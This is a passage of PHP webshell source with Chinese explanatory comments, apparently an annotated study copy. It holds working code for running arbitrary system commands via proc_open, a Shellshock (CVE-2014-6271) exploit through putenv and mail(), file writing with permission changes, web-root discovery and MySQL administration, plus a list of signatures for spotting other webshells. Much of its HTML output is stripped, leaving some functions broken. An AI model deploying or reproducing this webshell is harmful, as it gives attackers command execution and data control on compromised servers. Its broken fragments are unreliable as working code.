exec($cmd); $f = $e->StdOut(); $res = $f->ReadAll(); } // elseif (function_exists('proc_open')) { $length = strcspn($cmd, " \t"); //返回 $cmd 中,所有字符都不存在于 ' \t' 范围的起始子字符串的长度 $token = substr($cmd, 0, $length); //截取$length长的$cmd作为$token if (isset($aliases[$token])) { $cmd = $aliases[$token] . substr($cmd, $length); } //真正的cmd语句在这 //proc_open中,0 表示标准输入(stdin),1 表示标准输出(stdout),2 表示标准错误(stderr) //这里用了1和2,比较完善 $p = proc_open($cmd, array(1 => array('pipe', 'w'), 2 => array('pipe', 'w')), $io); while (!feof($io[1])) { //htmlspecialchars: 将特殊字符转换为 HTML 实体 //ENT_QUOTES: 会转换双引号,不转换单引号。 $res .= htmlspecialchars(fgets($io[1]), ENT_COMPAT, 'UTF-8'); } while (!feof($io[2])) { $res .= htmlspecialchars(fgets($io[2]), ENT_COMPAT, 'UTF-8'); } fclose($io[1]); fclose($io[2]); proc_close($p); } //bash破壳漏洞(CVE-2014-6271) elseif (function_exists('mail')) { if (strstr(readlink("/bin/sh"), "bash") != false) { $tmp = tempnam(".", "data"); putenv("PHP_LOL=() { x; }; $cmd >$tmp 2>&1"); mail("a@127.0.0.1", "", "", "", "-bv"); } else { $res = "Not vuln (not bash)"; } //这里顺序有问题,下面这段应该放在上面那个if里 $output = @implode('', @file($tmp)); @unlink($tmp); if ($output != "") { $res = $output; } else { $res = "No output, or not vuln."; } } return $res; } //webshell里图片的base64储存 function css_img($img) { $images = array( "exe" => "R0lGODlhEwAOAKIAAAAAAP///wAAvcbGxoSEhP///wAAAAAAACH5BAEAAAUALAAAAAATAA4AAAM7" . "WLTcTiWSQautBEQ1hP+gl21TKAQAio7S8LxaG8x0PbOcrQf4tNu9wa8WHNKKRl4sl+y9YBuAdEqt" . "xhIAOw==", "dir" => "R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAA" . "AAAAAAAAAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdE" . "oMqCebp/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs=", "txt" => "R0lGODlhEwAQAKIAAAAAAP///8bGxoSEhP///wAAAAAAAAAAACH5BAEAAAQALAAAAAATABAAAANJ" . "SArE3lDJFka91rKpA/DgJ3JBaZ6lsCkW6qqkB4jzF8BS6544W9ZAW4+g26VWxF9wdowZmznlEup7" . "UpPWG3Ig6Hq/XmRjuZwkAAA7", "html" => "R0lGODlhEwAQALMAAAAAAP///2trnM3P/FBVhrPO9l6Itoyt0yhgk+Xy/WGp4sXl/i6Z4mfd/HNz" . "c////yH5BAEAAA8ALAAAAAATABAAAAST8Ml3qq1m6nmC/4GhbFoXJEO1CANDSociGkbACHi20U3P" . "KIFGIjAQODSiBWO5NAxRRmTggDgkmM7E6iipHZYKBVNQSBSikukSwW4jymcupYFgIBqL/MK8KBDk" . "Bkx2BXWDfX8TDDaFDA0KBAd9fnIKHXYIBJgHBQOHcg+VCikVA5wLpYgbBKurDqysnxMOs7S1sxIR" . "ADs=", "js" => "R0lGODdhEAAQACIAACwAAAAAEAAQAIL///8AAACAgIDAwMD//wCAgAAAAAAAAAADUCi63CEgxibH" . "k0AQsG200AQUJBgAoMihj5dmIxnMJxtqq1ddE0EWOhsG16m9MooAiSWEmTiuC4Tw2BB0L8FgIAhs" . "a00AjYYBbc/o9HjNniUAADs=", "xml" => "R0lGODlhEAAQAEQAACH5BAEAABAALAAAAAAQABAAhP///wAAAPHx8YaGhjNmmabK8AAAmQAAgACA" . "gDOZADNm/zOZ/zP//8DAwDPM/wAA/wAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAVk4CCOpAid0ACsbNsMqNquAiA0AJzSdl8HwMBOUKghEApbESBUFQwABICx" . "OAAMxebThmA4EocatgnYKhaJhxUrIBNrh7jyt/PZa+0hYc/n02V4dzZufYV/PIGJboKBQkGPkEEQ" . "IQA7", "mp3" => "R0lGODlhEAAQACIAACH5BAEAAAYALAAAAAAQABAAggAAAP///4CAgMDAwICAAP//AAAAAAAAAANU" . "aGrS7iuKQGsYIqpp6QiZRDQWYAILQQSA2g2o4QoASHGwvBbAN3GX1qXA+r1aBQHRZHMEDSYCz3fc" . "IGtGT8wAUwltzwWNWRV3LDnxYM1ub6GneDwBADs=", "img" => "R0lGODlhEAAQADMAACH5BAEAAAkALAAAAAAQABAAgwAAAP///8DAwICAgICAAP8AAAD/AIAAAACA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAARccMhJk70j6K3FuFbGbULwJcUhjgHgAkUqEgJNEEAgxEci" . "Ci8ALsALaXCGJK5o1AGSBsIAcABgjgCEwAMEXp0BBMLl/A6x5WZtPfQ2g6+0j8Vx+7b4/NZqgftd" . "FxEAOw==", "title" => "R0lGODlhDgAOAMQAAOGmGmZmZv//xVVVVeW6E+K2F/+ZAHNzcf+vAGdnaf/AAHt1af+" . "mAP/FAP61AHt4aXNza+WnFP//zAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "ACH5BAAHAP8ALAAAAAAOAA4AAAVJYPIcZGk+wUM0bOsWoyu35KzceO3sjsTvDR1P4uMFDw2EEkGUL" . "I8NhpTRnEKnVAkWaugaJN4uN0y+kr2M4CIycwEWg4VpfoCHAAA7", "rar" => "R0lGODlhEAAQAPf/AAAAAAAAgAAA/wCAAAD/AACAgIAAAIAAgP8A/4CAAP//AMDAwP///wAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA" . "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD/ACH5BAEKAP8ALAAAAAAQABAAAAiFAP0YEEhwoEE/" . "/xIuEJhgQYKDBxP+W2ig4cOCBCcyoHjAQMePHgf6WbDxgAIEKFOmHDmSwciQIDsiXLgwgZ+b" . "OHOSXJiz581/LRcE2LigqNGiLEkKWCCgqVOnM1naDOCHqtWbO336BLpzgAICYMOGRdgywIIC" . "aNOmRcjVj02tPxPCzfkvIAA7" ); header('Content-type: image/gif'); echo base64_decode($images[$img]); die(); } //取文件后缀,返回文件类型 function css_showimg($file) { $it = substr($file, -3); switch ($it) { case "jpg": case "gif": case "bmp": case "png": case "ico": return 'img'; break; case "htm": case "tml": return 'html'; break; case "exe": case "com": return 'exe'; break; case "xml": case "doc": return 'xml'; break; case ".js": case "vbs": return 'js'; break; case "mp3": case "wma": case "wav": case "swf": case ".rm": case "avi": case "mp4": case "mvb": return 'mp3'; break; case "rar": case "tar": case ".gz": case "zip": case "iso": return 'rar'; break; default: return 'txt'; break; } } //打印html到页面上 function html_n($data) { echo "$data\n"; } //木马?Unknown function muma($filecode, $filetype) { $dim = array( "php" => array("eval(", "exec("), "asp" => array("WScript.Shell", "execute(", "createtextfile("), "aspx" => array("Response.Write(eval(", "RunCMD(", "CreateText()"), "jsp" => array("runtime.exec(") ); foreach ($dim[$filetype] as $code) { if (stristr($filecode, $code)) { return true; } } } //判断文件后缀 function debug($file, $ftype) { $type = explode('|', $ftype); foreach ($type as $i) { if (stristr($file, $i)) { return true; } } } //替换路径中的 // 为 / function str_path($path) { return str_replace('//', '/', $path); } //弹窗 function msg($msg) { die(""); } //返回路径中的目录部分,替换\\为/,并进行url编码 function uppath($nowpath) { $nowpath = str_replace('\\', '/', dirname($nowpath)); return urlencode($nowpath); } //输出带有target的a function html_ta($url, $name) { html_n("$name"); } //html的a function html_a($url, $name, $where = '') { html_n("$name "); } //显示指定的url图片 function html_img($url) { html_n(""); } //返回 function back() { html_n(""); } //html的radio function html_radio($namei, $namet, $v1, $v2) { html_n('' . $namei); html_n('' . $namet . '

'); } //html的input function html_input($type, $name, $value = '', $text = '', $size = '', $mode = false) { if ($mode) { html_n("$text"); } else { html_n("$text "); } } //html的textarea function html_text($name, $cols, $rows, $value = '') { html_n("

"); } //html的select function html_select($array, $mode = '', $change = '', $name = 'class') { html_n(""); } //html的font function html_font($color, $size, $name) { html_n("$name"); } //替换\\为/,替换//为/ function File_Str($string) { return str_replace('//', '/', str_replace('\\', '/', $string)); } //文件写入 function File_Write($filename, $filecode, $filemode) { $key = true; $handle = @fopen($filename, $filemode); if (!@fwrite($handle, $filecode)) { @chmod($filename, 0666); $key = @fwrite($handle, $filecode) ? true : false; } @fclose($handle); return $key; } //返回www根目录 function File_Mode() { $RealPath = realpath('./'); $SelfPath = $_SERVER['PHP_SELF']; $SelfPath = substr($SelfPath, 0, strrpos($SelfPath, '/')); return File_Str(substr($RealPath, 0, strlen($RealPath) - strlen($SelfPath))); } //文件所属用户 function GetFileOwner($File) { if (PATH_SEPARATOR == ':') { if (function_exists('posix_getpwuid')) { $File = posix_getpwuid(fileowner($File)); } return $File['name']; } } //文件所属组 function GetFileGroup($File) { if (PATH_SEPARATOR == ':') { if (function_exists('posix_getgrgid')) { $File = posix_getgrgid(filegroup($File)); } return $File['name']; } } //文件大小数字处理 function File_Size($size) { $kb = 1024; $mb = 1024 * $kb; $gb = 1024 * $mb; $tb = 1024 * $gb; $db = 1024 * $tb; if ($size < $kb) { return $size . " B"; } elseif ($size < $mb) { return round($size / $kb, 2) . " K"; } elseif ($size < $gb) { return round($size / $mb, 2) . " M"; } elseif ($size < $tb) { return round($size / $gb, 2) . " G"; } elseif ($size < $db) { return round($size / $tb, 2) . " T"; } else { return round($size / $db, 2) . " ST"; } } //读取文件 function File_Read($filename) { $handle = @fopen($filename, "rb"); $filecode = @fread($handle, @filesize($filename)); @fclose($handle); return $filecode; } //数组编码转换 function array_iconv($data, $output = 'utf-8') { $encode_arr = array('UTF-8', 'ASCII', 'GBK', 'utf8', 'BIG5', 'JIS', 'eucjp-win', 'sjis-win', 'EUC-JP'); $encoded = mb_detect_encoding($data, $encode_arr); if (!is_array($data)) { return mb_convert_encoding($data, $output, $encoded); } else { foreach ($data as $key => $val) { $key = array_iconv($key, $output); if (is_array($val)) { $data[$key] = array_iconv($val, $output); } else { $data[$key] = mb_convert_encoding($data, $output, $encoded); } } return $data; } } //Unknown function Mysql_Len($data, $len) { if (strlen($data) < $len) { return $data; } return substr_replace($data, '...', $len); } //一些js,最后那些php unknown function css_js($num, $code = '') { html_n('"); } //左侧CSS function css_left() { $str = << .menu{width:152px;margin-left:auto;margin-right:auto;} .menu dl{margin-top:2px;} .menu dl dt{top left repeat-x;} .menu dl dt a{height:22px;padding-top:1px;line-height:18px;width:152px;display:block;color:#FFFFFF;font-weight:bold; text-decoration:none; 10px 7px no-repeat;text-indent:20px;letter-spacing:2px;} .menu dl dt a:hover{color:#FFFFCC;} .menu dl dd ul{list-style:none;} .menu dl dd ul li a{color:#000000;height:27px;widows:152px;display:block;line-height:27px;text-indent:28px; background:#BBBBBB no-repeat 13px 11px;border-color:#FFF #545454 #545454 #FFF; border-style:solid;border-width:1px;} .menu dl dd ul li a:hover{background:#FFF no-repeat 13px 11px;color:#FF6600;font-weight:bold;} end; html_n($str); $str = << function getObject(objectId){ if(document.getElementById && document.getElementById(objectId)) { return document.getElementById(objectId); } else if (document.all && document.all(objectId)) { return document.all(objectId); } else if (document.layers && document.layers[objectId]) { return document.layers[objectId]; } else { return false; } } function showHide(objname){ var obj = getObject(objname); if(obj.style.display == "none"){ obj.style.display = "block"; }else{ obj.style.display = "none"; } } "; $result = @mysql_query($query, $conn); $k = 0; while ($table = @mysql_fetch_row($result)) { $charset = substr($statucoll[$k], 0, strpos($statucoll[$k], '_')); echo ""; echo ""; echo '" . "\r\n"; $k++; } echo "
表名 操作 字符集 大小
' . $table[0] . " 删除 ' . $statucoll[$k] . "" . File_Size($statusize[$k]) . "
"; } } } else { $cookietime = time() - 6 * 3600; setcookie($cookie_name_mysql . 'host', "", $cookietime); setcookie($cookie_name_mysql . 'port', "", $cookietime); setcookie($cookie_name_mysql . 'user', "", $cookietime); setcookie($cookie_name_mysql . 'pass', "", $cookietime); die("连接MYSQL失败,请重新登陆."); } break; default: html_main(); break; } css_foot(); ob_end_flush();